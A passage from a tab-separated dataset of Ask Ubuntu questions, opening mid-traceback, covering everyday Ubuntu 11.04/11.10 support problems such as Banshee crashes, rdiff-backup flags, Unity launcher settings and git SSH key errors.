__call__ file `` \lib\wubi\backends\common\backend.py '' , line 492 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 347 , in download_iso oserror : [ errno 13 ] permission denied : u'c : \\ubuntu\\install\\ubuntu-11.04-desktop-amd64.iso' 10-08 18:02 debug tasklist : # cancelling tasklist 10-08 18:02 debug tasklist : # finished tasklist 10-08 18:02 error root : [ errno 13 ] permission denied : u'c : \\ubuntu\\install\\ubuntu-11.04-desktop-amd64.iso' traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 57 , in run file `` \lib\wubi\application.py '' , line 131 , in select_task file `` \lib\wubi\application.py '' , line 157 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 492 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 347 , in download_iso oserror : [ errno 13 ] permission denied : u'c : \\ubuntu\\install\\ubuntu-11.04-desktop-amd64.iso'
64820	wkhtmltopdf wkhtmltoimage : can not connect to x server	i compiled wkhtmltopdf from source on ubuntu 64bit server 10.04 as described in manual . when i try to convert it exits with an error message : wkhtmltoimage : can not connect to x server there is x server installed but not running . if i download already built version it is working but sometimes throws `` segmentation fault '' exception . so how to make compiled from source version work ?
64823	printer output shifted on a brother dcp-135c	whenever i print anything , the output is shifted about 3 cm towards the top . that causes the 3-4 first lines to be `` cut off '' and it will start printing the ~ 4th line . ( and of course therefore the page is blank within the last lines . ) i print using evince . oh , btw , printing with adobe reader wo n't print at all . ( with no visible error message in the gui . ) any idea how to fix that ? i have a brother dcp-135c and the newest stable ubuntu version..
64827	can i sync ubuntu one contacts with my android device ?	am i able to sync contacts from my android device with ubuntu one or is it only with ubuntu desktop for now ?
64831	how can i always show the close , minimise & maximise buttons into their own windows ?	ubuntu 11.10 hides the close , min and max buttons in the top panel . is there a way to bring all that back into the actual window and not in the panel ? not just the buttons , but also the file , edit menus back into their actual windows ?
64832	how to remove wubi , without causing boot issues ?	i have windows 7 as my main host os , and then i installed wubi ubuntu 11.04 . later to this i installed a partition ubuntu 11.10 ( beta 2 ) . so altogether i have windows 7 , 11.04 ( wubi ) 11.10 beta 2 now basically what i want to do is move some files from the wubi installation via a usb and move them onto the ubuntu 11.10 partition . and then i want to completely remove wubi from my pc , without causing any issues with the grub or anything that will prevent booting thank you for any feedback guys : )
64833	vi shortcut to delete `` until the next x character ''	i understand that vi has shortcut keys to delete character , word and line with various options . however , i could not find this : to delete from cursor to the next specified character . i might type du '' ( example ) expecting the editor to `` delete until the next double quote character is found '' the closest i know is the d9w where 9 is the number of words to delete . anyone knows if this is possible ?
64837	how to share internet access between ubuntu and windows guests os in virtualbox ?	using virtualbox . there 's two virtual machines , ubuntu 10.04 and windows 7 . on ubuntu : there 's two ethernet interfaces . bridge interface ( eth0 ) who can access the internet . ping www.google.com works ok. nat interface ( eth1 ) configured as internal network who have ip 10.0.0.101 , netmask 255.255.255.0 and gateway 10.0.0.1 who can ping windows 7 in 10.0.0.102 . on windows a interface who have ip 10.0.0.102 and can ping linux in 10.0.0.101 ok , but ca n't ping www.google.com . so , how can i configure windows to have access to the internet using my linux machine ?
64839	why does flashplugin-installer display a multi-line terminal progress when downloading ?	i have this issue from many ubuntu releases . why when i wget a file it takes just one row and give me all information ( like time , total space , bit downloaded , percent ) when downloading flashplugin via flashplugin installer , the installer in a terminal displayed many rows - why ?
64842	how do i create a state transition diagram ?	i am drawing a state transition diagram using libreoffice draw on ubuntu 11.04 . i am able to get almost everything that i needed except the final state . typically we use two circles embedded in for showing a final state of a state transition diagram . could someone help me to do that ? please also let me know if there are any better tools for drawing state transition diagrams on ubuntu . i have looked at dia , but it is not also useful to draw final state of a state transition diagram like in this .
64846	banshee is n't starting anymore	my banshee does n't start anymore . i tried to start it over the terminal just to see if something is broken but all the terminal gave me was this : moere @ samsung-nf110 : ~ $ banshee [ info 18:45:29.413 ] running banshee 2.2.0 : [ ubuntu oneiric ( development branch ) ( linux-gnu , i686 ) @ 2011-09-23 04:51:00 utc ] exception in gtk # callback delegate note : applications can use glib.exceptionmanager.unhandledexception to handle the exception . system.argumentexception : value does not fall within the expected range . at hyena.gui.canvas.rect.set_height ( double value ) [ 0x00000 ] in < filename unknown > :0 at hyena.gui.canvas.rect.op_explicit ( rectangle rect ) [ 0x00000 ] in < filename unknown > :0 at hyena.data.gui.listview`1 [ banshee.collection.albuminfo ] .onsizeallocated ( rectangle allocation ) [ 0x00000 ] in < filename unknown > :0 at gtk.widget.sizeallocated_cb ( intptr widget , intptr allocation ) [ 0x00000 ] in < filename unknown > :0 at glib.exceptionmanager.raiseunhandledexception ( system.exception e , boolean is_terminal ) at gtk.widget.sizeallocated_cb ( intptr widget , intptr allocation ) at gtk.widget.gtksharp_widget_base_show ( intptr ) at gtk.widget.onshown ( ) at nereid.playerinterface.onshown ( ) at gtk.widget.shown_cb ( intptr widget ) at gtk.widget.gtk_widget_show ( intptr ) at gtk.widget.show ( ) at banshee.gui.baseclientwindow.initialshowpresent ( ) at nereid.playerinterface.initialize ( ) at banshee.gui.baseclientwindow.initializewindow ( ) at banshee.gui.baseclientwindow..ctor ( system.string title , system.string confignamespace , int32 defaultwidth , int32 defaultheight ) at nereid.playerinterface..ctor ( ) at system.reflection.monocmethod.internalinvoke ( system.reflection.monocmethod , system.object , system.object [ ] , system.exception byref ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) at system.activator.createinstance ( system.type type , boolean nonpublic ) at system.activator.createinstance ( system.type type ) at banshee.servicestack.servicemanager.registerservice ( system.type type ) at banshee.servicestack.servicemanager.run ( ) at banshee.servicestack.application.run ( ) at banshee.gui.gtkbaseclient.initialize ( boolean registercommonservices ) at banshee.gui.gtkbaseclient..ctor ( boolean initializedefault , system.string defaulticonname ) at banshee.gui.gtkbaseclient..ctor ( ) at nereid.client..ctor ( ) at system.reflection.monocmethod.internalinvoke ( system.reflection.monocmethod , system.object , system.object [ ] , system.exception byref ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) at system.activator.createinstance ( system.type type , boolean nonpublic ) at system.activator.createinstance ( system.type type ) at banshee.gui.gtkbaseclient.startup ( ) at hyena.gui.cleanroomstartup.startup ( hyena.gui.startupinvocationhandler startup ) at banshee.gui.gtkbaseclient.startup ( ) at banshee.gui.gtkbaseclient.startup ( system.string [ ] args ) at nereid.client.main ( system.string [ ] args ) at system.appdomain.executeassembly ( system.appdomain , system.reflection.assembly , system.string [ ] ) at system.appdomain.executeassemblyinternal ( system.reflection.assembly a , system.string [ ] args ) at system.appdomain.executeassembly ( system.string assemblyfile , system.security.policy.evidence assemblysecurity , system.string [ ] args ) at system.appdomain.executeassembly ( system.string assemblyfile ) at booter.booter.bootclient ( system.string clientname ) at booter.booter.main ( ) moere @ samsung-nf110 : ~ $ so i have no clue what to do . i already tried : sudo apt-get purge banshee ; sudo apt-get install banshee and after that removing ~/.gconf/apps/banshee-1 ~/.cache/banshee-1 ~/.config/banshee-1 but nothing helped me out . muinshee is working fine ... any suggestions ? update : i tried using sudo banshee and it worked `moere @ samsung-nf110 : ~ $ sudo banshee [ sudo ] password for moere : [ info 19:23:21.402 ] running banshee 2.2.0 : [ ubuntu oneiric ( development branch ) ( linux-gnu , i686 ) @ 2011-09-23 04:51:00 utc ] [ warn 19:23:22.717 ] dbus support could not be started . disabling for this session . - system.argumentnullexception : argument can not be null . parameter name : address ( in `dbus-sharp ' ) at dbus.bus.open ( system.string address ) [ 0x00000 ] in < filename unknown > :0 at dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 system.exception : unable to open the session message bus . ( in `dbus-sharp ' ) at dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 at dbus.busg.init ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.dbusconnection.connect ( system.string servicename , boolean init ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.dbusconnection.connect ( system.string servicename ) [ 0x00000 ] in < filename unknown > :0 [ info 19:23:25.303 ] updating web proxy from gconf [ warn 19:23:25.664 ] caught an exception - system.argumentnullexception : argument can not be null . parameter name : address ( in `dbus-sharp ' ) at dbus.bus.open ( system.string address ) [ 0x00000 ] in < filename unknown > :0 at dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 [ warn 19:23:25.665 ] extension `banshee.soundmenu.soundmenuservice ' not started : unable to open the session message bus . [ warn 19:23:25.671 ] caught an exception - system.applicationexception : no support gnome settings daemon could be reached . ( in `banshee.multimediakeys ' ) at banshee.multimediakeys.multimediakeysservice.banshee.servicestack.iextensionservice.initialize ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.servicemanager.startextension ( mono.addins.typeextensionnode node ) [ 0x00000 ] in < filename unknown > :0 [ warn 19:23:25.672 ] extension `banshee.multimediakeys.multimediakeysservice ' not started : no support gnome settings daemon could be reached . ( banshee:4324 ) : gtk-warning ** : refusing to add non-unique action 'closeaction ' to action group 'global' [ warn 19:23:25.820 ] caught an exception - system.argumentnullexception : argument can not be null . parameter name : address ( in `dbus-sharp ' ) at dbus.bus.open ( system.string address ) [ 0x00000 ] in < filename unknown > :0 at dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 [ warn 19:23:25.820 ] extension `banshee.soundmenu.soundmenuservice ' not started : unable to open the session message bus . [ warn 19:23:25.821 ] caught an exception - system.applicationexception : no support gnome settings daemon could be reached . ( in `banshee.multimediakeys ' ) at banshee.multimediakeys.multimediakeysservice.banshee.servicestack.iextensionservice.initialize ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.servicemanager.startextension ( mono.addins.typeextensionnode node ) [ 0x00000 ] in < filename unknown > :0 [ warn 19:23:25.821 ] extension `banshee.multimediakeys.multimediakeysservice ' not started : no support gnome settings daemon could be reached . [ info 19:23:25.827 ] all services are started 3,102282 [ info 19:23:27.355 ] amazonmp3 store redirect url : https : //one.ubuntu.com/music/store/amz/ [ info 19:23:28.948 ] nereid client started [ info 19:23:29.300 ] gstreamer version 0.10.35.0 , gapless : true , replaygain : false` but afterwards i tried it the `` normal '' way again and it resulted the same as in my first try using banshee in terminal . so it it 's still broken .
64849	switch to using rdiff-backup for backups of / instead of rsync ?	i usually use rsync to do backups , with a command like this : rsync -avxz -e `` ssh '' -- exclude `` .gvfs '' -- numeric-ids / /media/backup/slash/ how can i convert the arguments i use with rysnc to rdiff-backup ? update : ok , i made myself a `` shopping list '' . rsync flags : avxz = rlptgodvxz rdiff-backup flags ( not complete ) : -- preserve-numerical-ids -- exclude-other-filesystems -- include-symbolic-links -- include-special-files shopping list : rsync flag rsync explanation rdiff flag ? -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -r , -- recursive recurse into directories x -l , -- links copy symlinks as symlinks # done by -- include-symbolic-links ( i hope ) -p , -- perms preserve permissions -t , -- times preserve modification times -g , -- group preserve group -o , -- owner preserve owner ( super-user only ) x -- devices preserve device files ( super-user only ) # hopefully taken care of by -- include-special-files x -- specials preserve special files # hopefully taken care of by -- include-special-files x -x , -- one-file-system do n't cross filesystem boundaries # done by -- exclude-other-filesystems x -- numeric-ids do n't map uid/gid values by user/group name # done by -- preserve-numerical-ids so , what is left is how to preserve permissions , ownership , groups , modified times , and be recursive . i 'm not sure if rdiff-backup already does this , since this is a backup , i need to be sure everything is taken care of , not just think everything is taken care of . i 've tried it a few times , but i have n't stumbled on the formula yet : i used rdiff-backup -v5 -- preserve-numerical-ids -- include-symbolic-links -- include-special-files -- exclude-other-filesystems `` root @ 2001:470 : e89d:9ab6:21b:24ff : fe75:5822 : :/ '' /media/backup/rdiff/bjorn-laptop/one_ext4/ to backup and rdiff-backup -r now -v5 -- preserve-numerical-ids -- force /media/backup/rdiff/bjorn-laptop/one_ext4/ `` root @ 2001:470 : e89d:9ab6:21b:24ff : fe75:5822 : :/media/2f52fa73-b3a6-46ef-8e1b-e82d983b0b7f_/ '' to restore . after that , i tried modifying /etc/fstab on the restore with the new uuid and updating grub ( with the new uuid ) but i got errors about /dev , /sys , & /proc not being there . how can i use rdiff-backup so i only have to restore the backup , change /etc/fstab ( on the restore ) and update/install grub ?
64851	how do i remove a wine program ?	i want to remove spotify version 0.61 because it crashes on start up . but when i hit the `` remove/modify '' button it deselects my selection ( spotify ) and chooses the program above it ( counter-strike 1.6 ) . i have tried to remove counter strike , but it gives me an error with a missing file . so i 'm stuck and i have no idea how to move on please help me . the normal way to remove wine software does n't work as i have said . this is how-to : wine -- > uninstall wine software -- > select program -- > remove/modify button . wine 's uninstall program ca n't open the `` uninstall.ini '' file ( counter strike 1.6 )
64852	windows machine does not sync it 's folders	natty uploads files instantly , but the win7 box does not sync it 's folders , it does not down or up-load anything . ubuntu one client in windows says `` recync up-to-date '' , but it just is not . no problems with natty narwhal though .
64854	new application switcher gone and is now ugly	when i installed ubuntu 11.10 beta 2 , during live-cd install , i tried out the new application switcher and it worked beautifully . after the installation is complete , the new application switcher is gone . in its place is a ugly grey windows xp-ish thing . i am not sure if this is a graphics driver issue , because i enabled nvidia proprietary driver . but other 3d related things looks fine . so how can i get the new application switcher back ?
64857	statistical analysis	can any one offer advice please ? i am going to need to do some statistical analysis soon . looking for significant difference . i am a bit of a dunce in this area but i will have help . can you suggest which software would be most appropriate - in the past i have used spss . all suggestions will be welcome - thank you .
64858	how do i always show the launcher ( i.e . disable the auto-hide functionality ) ?	when i upgraded from 11.04 to 11.10 , the setting remained . now that i have done a clean install of 11.10 , the ccsm option does not work anymore and i ca n't seem to find a solution . also note that i am not talking about unity 2d . i 've tried unity -- reset and that does not help . logging out and back in does n't help removing the hidden directories in my home directory does n't help
64859	how do i remove desktop couch as a dependency on my application ?	quickly is a great application to create gui apps for ubuntu easily and quickly . maybe quickly use desktop-couch database as back-end database , which is a problem . i developed a gui apps using quickly . does not use any addition package which are not default installed in ubuntu . after installation of my apps everything works fine in my pc but it shows several errors in my friend 's pc which is ubuntu 11.04 installed . but he has no desktopcouch installed . i did not use desktop-couch in my gui , so why should anyone need to install desktopcouch as dependency . is there anyway to remove auto created desktopcouch dependency from quickly . i am new in quickly [ not linux ] so can not understand well . error : maruf @ phoenix : ~ $ enviornment-gui-ss traceback ( most recent call last ) : file `` /usr/bin/enviornment-gui-ss '' , line 43 , in < module > import enviornment_gui_ss file `` /usr/lib/pymodules/python2.7/enviornment_gui_ss/__init__.py '' , line 25 , in < module > from enviornment_gui_ss import enviornmentguisswindow file `` /usr/lib/pymodules/python2.7/enviornment_gui_ss/enviornmentguisswindow.py '' , line 25 , in < module > from enviornment_gui_ss_lib import window file `` /usr/lib/pymodules/python2.7/enviornment_gui_ss_lib/__init__.py '' , line 21 , in < module > from . preferences import preferences file `` /usr/lib/pymodules/python2.7/enviornment_gui_ss_lib/preferences.py '' , line 19 , in < module > from desktopcouch.records.server import couchdatabase file `` /usr/lib/pymodules/python2.7/desktopcouch/records/server.py '' , line 9 , in < module > from desktopcouch.application.server import * importerror : no module named application.server
64861	how to run openvpn access server and pptpd ( pptp server ) at the same time ?	openvpn access server relies heavily on iptables rules . and adding pptp network interfaces may interfere with as operation . i desperately need help getting two services to run properly on the same ubuntu 10.04 x64 server .
64866	stackapplet crashes when loading stats . what do i do ?	i upgraded to 11.10 ( from 11.04 ) , and now stackapplet crashes when loading my stats . what can i do to fix this ?
64868	minor sound and video issues with vlc , dell studio 1555	so , i have some video files , both with h264 and mpeg4 [ divx/xvid ] codecs . i had no problems on my old laptop [ dell inspiron 1525 ] , and also no problems with mplayer , but with vlc , i have minor issues with both the sound and video . for one thing , the audio , more often than not , seems slightly out of sync . it 's not too bad , just enough to be annoying . i use the j and k hotkeys to adjust it , but sometimes it does n't seem to work right . also , every single time i pause and then play a video , it plays for half a second , but then the audio cuts out for about a quarter second , then after that , continues to play without any more interrupting [ until i pause it again ] . now for video , whenever i seek in a video , it feels sluggish , and takes much longer to seek than mplayer . it 's kind of annoying , i considered switching to smplayer , but after trying it , i realized i like the keyboard shortcuts too much [ shift+arrow to seek 3 seconds , alt+arrow for 10 , ctrl+arrow for 60 ] . i have tried both alsa and pulseaudio for audio , oss produces nothing , and tried various video drivers under vlc 's preferences , but nothing seemed to make it work better .
64870	how to point /usr/bin/python to python2.6 ?	i had done something like : http : //paste.ubuntu.com/704579/ i kind of want to undo that one . while trying to remove virtualbox-ose i get the error saying removing virtualbox-ose ... * stopping virtualbox kernel modules [ ok ] traceback ( most recent call last ) : file `` /usr/bin/pycentral '' , line 2300 , in < module > main ( ) file `` /usr/bin/pycentral '' , line 2294 , in main rv = action.run ( global_options ) file `` /usr/bin/pycentral '' , line 1653 , in run runtimes = get_installed_runtimes ( with_unsupported=true ) file `` /usr/bin/pycentral '' , line 278 , in get_installed_runtimes default_version = pyversions.default_version ( version_only=true ) file `` /usr/share/pycentral-data/pyversions.py '' , line 172 , in default_version raise valueerror , `` /usr/bin/python does not match the python default version . it must be reset to point to % s '' % debian_default valueerror : /usr/bin/python does not match the python default version . it must be reset to point to python2.6 dpkg : error processing virtualbox-ose ( -- remove ) : subprocess installed pre-removal script returned error exit status 1 traceback ( most recent call last ) : file `` /usr/bin/pycentral '' , line 2300 , in < module > main ( ) file `` /usr/bin/pycentral '' , line 2294 , in main rv = action.run ( global_options ) file `` /usr/bin/pycentral '' , line 1477 , in run runtimes = get_installed_runtimes ( ) file `` /usr/bin/pycentral '' , line 278 , in get_installed_runtimes default_version = pyversions.default_version ( version_only=true ) file `` /usr/share/pycentral-data/pyversions.py '' , line 172 , in default_version raise valueerror , `` /usr/bin/python does not match the python default version . it must be reset to point to % s '' % debian_default valueerror : /usr/bin/python does not match the python default version . it must be reset to point to python2.6 dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : virtualbox-ose e : sub-process /usr/bin/dpkg returned an error code ( 1 ) there is a line which says /usr/bin/python does not match the python default version . it must be reset to point to python2.6 so my question is how to get /usr/bin/python to match the default version ( python2.6 ) ?
64879	route output to input/skype upload greeter audio file	i need to record a greeting message in skype , but i already have a .flac but i do n't think you can do this so i thought maybe there is a way to pipe vlc 's output to skype 's input . any help is greatly appreciated , thanks in advance , ell .
64884	text colors in unity	if i want to try out a different gtk3-theme using the unity shell , i always have troubles with colors of the text . many themes seem to have trouble with upper bar using similar text colors ( i.e . black letters on black unity bar ) , some themes have great troubles with thunderbird and firefox - in fact even the context menus of thunderbird and firefox in the default ambiance themes are messed up . is there a way to manually fix this ? i know how to change the colors of the firefox/thunderbird menu texts , but i have no idea about changing the rest .
64885	how do i upgrade from 11.04 to 11.10 ?	i am ready to try ubuntu 11.10 , how do i upgrade to it from 11.04 ?
64889	give permission to user only to install applications	i 've been using linux for 6 years , but only now i had the task of creating 2 accounts into one pc . those 2 accounts are admin ( mine ) and user ( my mother 's ) , the problem is , when she tried to install an application ubuntu ask for the admin password , but i want her to install and remove wathever software she wants but without all the admin permissions : s ... is there anyway to do that ? thanks in advance and sorry for my horrible english , luis da costa
64890	how do i install python 2.6 ?	i 'm very new in ubuntu , also in linux . i 've just installed ubuntu 11.04 which comes with python 2.7 by default . but i want to install python 2.6 , how am i about to do that ? thanks .
64892	opening files from nautilus through script that resizes window automatically ?	is it possible to open a picture / video / text / etc file from nautilus into a script that uses wmctrl to move and resize the window automatically when it loads ? example : in nautilus , double clicking a file example.avi in nautilus file browser opens the file at specified place/size automatically with no user input .
64896	how to play music from itunes library located in a windows 7 partition ?	i have 2 partitions , one for windows 7 and the other for ubuntu 11.04 . all my music and the itunes library is saved in the windows partition , but i 'd like to be able to play these songs and use these playlists in ubuntu , but i do n't want to copy all the songs and playlists from the windows partition . is it possible to play them directly from the windows partition and be able to use my playlists from my itunes library ? ( i do n't really care about which music player i 'll need to use , feel free to give suggestions )
64897	possible to upgrade to 11.10 without the `` extra applications '' . like no-install-recommends ?	i am using 11.04 which i started off with a command line system via alternate cd then installed apps on top . when i upgrade to 11.10 soon , isit possible to upgrade just the os , probably with the core files ( unity etc ) but without the extra apps ( office etc , unless i have them installed already ) or do i need to installed from scratch from a 11.10 alternate cd again ?
64903	network manager forgets wireless password after sleeping or powering off	every time i restore my computer from sleep or turn it on a window pops up asking for my wireless password . once i enter it it connects successfully , but this happens every time . i 'm using ubuntu 11.10 with all updates installed . should n't the password be remembered so you do n't have to enter it every time i get on ? anyone know why this is happening and how to fix it ?
64905	encrypted /home wo n't decrypt after upgrade to 11.10	i did a clean install of beta 2 10.11 and pointed the install to my /home which is on a separate partition . i also checked encrypt home . once installed , my documents folder is `` empty '' but there is still 100gb of space being used . if i use sudo ecryptfs-recover-private it will mount the old /home to a /tmp folder and i can see the contents . how do i fix this so that my /home decrypts normally when i log in ? thanks .
64912	will applications in the software center receive updates of new versions ?	is it possible to provide updates for software in ubuntu 11.10 software center . for example upcoming versions of vlc , inkscape and many others .
64914	how can i change the keyboard layout in the login screen ?	i have different users on the machine who use different keyboard layouts . in 11.04 , you could change the keyboard layout on the login screen ( and it would remember it per user ) . how can i do this in 11.10 ? or is it not possible ?
64915	how do i install ubuntu on a virtualbox client from an iso image ?	i have the iso image file ( that is , *.iso ) , and i am trying to boot my virtualbox installation with this image . is it possible ? i know how to mount my iso image to my filesystem ( on my host machine ) , but i do n't think virtualbox boots an os from a location on my file system . i 've even tried to mimic the mounting such that virtualbox thinks it has to boot from the cd drive , but availed only failure . what is the correct way to install an os from an iso image on virtualbox ? my host machine is ubuntu 10.04 ( lucid lynx ) . and my virtualbox version is 4.1.4 .
64916	why are thunderbird-lightning events not showing in unity panel calendar ?	this is very annoying as evolution events were not only visible , but also clickable in the unity panel calendar . is n't this possible with thunderbird in oneiric ?
64918	can not find the 'lg ' ( looking glass ) command in gnome3	i am not able to find the lg command in my ubuntu 11.10 installation . i have installed gnome3 from gnome.org website , following the install link for ubuntu . so i think everything should be fine . but the lg command is missing and i am not able to find any package providing it . any hint ?
64923	can i use the terminal from 11.04 in 10.10 ?	i had ubuntu 10.10 . i had seen terminal of ubuntu 11 version . it 's really good to see the maximize features of that terminal . can i upgrade my current terminal to version 11 terminal ?
64925	firefox 7 starts with an empty `` alert '' -window and browsing does not work	today , after i started ubuntu ( 11.04 ) i noticed this window immediately after running firefox : as you can see it is empty . no information about what is probably wrong . i closed the file and tryed to open a page ( e.g . www.google.de ) . but firefox does not show any content . browsing seems not possible . i restarted firefox several times but the behavior did not change . sometimes the this `` alert '' -window does show this text : could not initialize the application 's security component . the most likely cause is problems with files in your application 's profile directory . please check that this directory has no read/write restrictions and your hard disk is not full or close to full . it is recommended that you exit the application and fix the problem . if you continue to use this session , you might see incorrect application behaviour when accessing security features . i have enough hard disk space ( 30 gigabyte remaining free ) . i reinstalled firefox by the ubuntu software center , but the problem remained . i do n't know how to proceed to track down the error . any suggestions ?
64926	how to install gcj ?	it seems i need to install gcc but :
64931	considerations when restoring backup from 1 machine to another	i am using remastersys to create backups of my os . i noticed that when using the backup option , when restoring from 1 machine to another , my resolution was n't optimal ... idealy , i will also like user/passwords to be different ... i believe there are other things that might need to be changed manually like driver config etc ? what do i need to consider and do to fix them when restoring a backup from 1 machine to another ( with different hardware ) ? would using the tar method have a similar problem with different hardware ? like gpu 's or even cpu being different , like backup from desktop restored to laptop ? main purpose : sync apps
64932	creating your own distro/backup ( or alternatives to remastersys )	i usually use remastersys to create a backup/distro of my current system with apps intact . but recently , remastersys was discontinued . i wonder if there are alternatives to that ? if not , i believe i can create a distro/backup/live cd manually ? how ? the main objectives is to backup/restore apps settings idealy , user accounts/passwords to be set as new live system a plus
64933	prevent temporally suspend/hibernate from script ?	is there any way to prevent temporally suspend/hibernate from a script ? i want the screen to enter in powersave mode when appropriate , but the computer does n't stop . caffeine does n't allow this : it disables all or nothing . why i want to do this ? because sometimes i download huge amount of files from a server via ftp . these downloads can take hours to complete .
64935	unable to view text on omg ! ubuntu ! website in firefox 7	i am unable to view any text on the omg ! ubuntu ! website . i am using firefox 7 on oneiric . i also have all the latest updates installed . i am using noscript , if that matters . as you can see from the post , i have allowed all the necessary domains in noscript . i even tried to view the page after temporarily allowing all scripts on the page using noscript . still got the same problem . so , noscript is not the culprit here . i was able to view this website properly a few days back on oneiric . one day , i suddenly started getting this problem . list of extensions that i am using : noscript adblock plus with element hiding helper ( for text ads ) down them all flagfox flashblock foxrunner https everywhere personas restartless restart tab preview wot
64936	youtube video freezes in lubuntu 11.04	what happens : ( 1 ) video freezes after a few seconds of idling while audio remains intact . ( 2 ) video resumes if i move the mouse . what i tried : ( 1 ) right click on a video - > `` settings '' - > uncheck `` enable hardware acceleration '' ( 2 ) chromium . ( i usually use firefox . ) ( 3 ) sudo pm-powersave false ( 4 ) removed and reinstalled flash plug-in . sudo apt-get autoremove flashplugin-installer sudo apt-get autoremove flashplugin-nonfree sudo apt-get install flashplugin-installer ( 5 ) installed flash-aid and used it . ( both stable and beta options . ) no improvement so far . update ( more info ) : sudo lshw -c display *-display:0 description : vga compatible controller product : mobile gm965/gl960 integrated graphics controller ( primary ) vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : f0000000-f00fffff memory : d0000000-dfffffff ioport:1800 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile gm965/gl960 integrated graphics controller ( secondary ) vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 03 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : f0100000-f01fffff
64942	how to log in into windows ubuntu one client as an restricted windows user ( windows 7 ) ?	i have generated an account as windows admin , but now i want to use the client as a restricted user . when i try to login there , it appears only the message `` getting information , please wait ... '' but nothing more . i did wait for about 10 minutes . the client ist correctly setup in the windows firewall . what can i do ?
64950	why do most gnome developers prefer python over java for gtk+ programming ?	i only know c and java . and i really do n't want to learn another language when i can work with what i already know . i have n't ever written a gtk+ application , but i am planning to start with an experimental project . so , are there any advantages of writing in python over java ( with respect to gtk+ ) ?
64951	how can i add my application to the ubuntu repository ?	i 've just made a project called tgames and want to add it at the ubuntu repository ... ( multiverse or universe or anything ) can i do this or should i create a ppa ? ? ?
64960	kpackagekit hangs	i just installed kubuntu 11.04 and the problem i have is that kpackagekit `` froze '' while installing updates . it froze while installing some plasma widgets . so my question is how can i disable the updating process without breaking the system and what is the most recommended way to install updates on kubuntu ( i have realized that kpackagekit is really buggy ) ?
64961	rhythmbox ( or any music player ) does n't change songs properties	i have some songs in my rhythmbox , but i can not change their properties , i.e. , i can not write anything in the properties window . it seems to be block or something like that . i thought that such files are read-only or protected but i change such properties with sudo and nothing changed . any idea ?
64964	how ( and where ) can one change 'user @ host $ : ' pattern in gnome-terminal ?	when i start terminal in ubuntu , i see : ilya @ host : ~ $ i need to add a timestamp to this , something like : 2011-10-09t09:32:00 ilya @ host : ~ $ how can i configure this ?
64967	my tomboy notes on windows xp does n't have an ssh plugin	syncing my notes with ssh in ubuntu works fine . but this plugin is n't visible in tomboy on my windows machine . surely there must be a way ? the preferences > plugins tab does n't even have ssh as a sync option .
64968	how do i enable mp3 preview ?	just upgraded from 11.04 to 11.10 and nautilus no longer previews mp3 files when i hover over them . another pc that 's been running 11.10 for a while also experienced this after the latest update nautilus preferences no longer show options for media / mp3 files , so how can i get this functionality back ?
64970	is it there any advantage to unticking the `` source code '' entry of a repository ?	above is a screenshot showing an enabled ppa from the ayatana-scrollbar-team . there are two entries , one with a `` ( source code ) '' label and one without . if installing ubuntu on a computer where the user is not very knowledgeable about computers , is there any advantage in unticking the `` ( source code ) '' entry ? for example , will it shorten the time needed for `` sudo apt-get update '' to complete ? how is the `` ( source code ) '' repo used ? does it have a purpose on machines used by people who do n't even know how to read source code ? i 'd like to know if i should just keep it enabled or whether i would lose/gain anything by disabling it .
64974	git public key error solution	i have set up my ssh key using this tutorial http : //help.github.com/linux-set-up-git/ and tested it with this this command ssh -t git @ github.com the result was my user name . and i pushed a existing project as a git repo . after branching out , doing some update then merged with the dev branch . while i was pushing the dev branch to remote . the permission denied ( publickey ) . fatal : the remote end hung up unexpectedly my .ssh folder has sufficient permission . how to solve the fatal error ?
64978	opening program from nautilus through custom script	would like to open all avi and mpeg files from folders in nautilus into a script that opens the file and moves the window using wmctrl . basically , i need to open all media files with a script that brings up totem and opens the file then moves it 135 pixels over . was thinking something like # ! bin/bash totem $ 1 & sleep 1 & & wmctrl -r `` totem '' -e 1,135,0,800,600 i tried this but got no sound , and it does n't resize either . can anyone see anything obvious i 'm doing wrong ?
64985	dual head problem	i am running dual head on my laptop with two screens of different dimensions ( 1280 x 1024 and 1280 x 800 ) . the video card is a radeon x1200 . on booting the correct desktop background is displayed briefly and then it disappears to be replaced by black . if i drag a window round the screen ( s ) it leaves trails and if i close it the image of the window stays there ( ie as a background ) . not vital , but a pain . any way to fix it ? it 's amd64 11.04
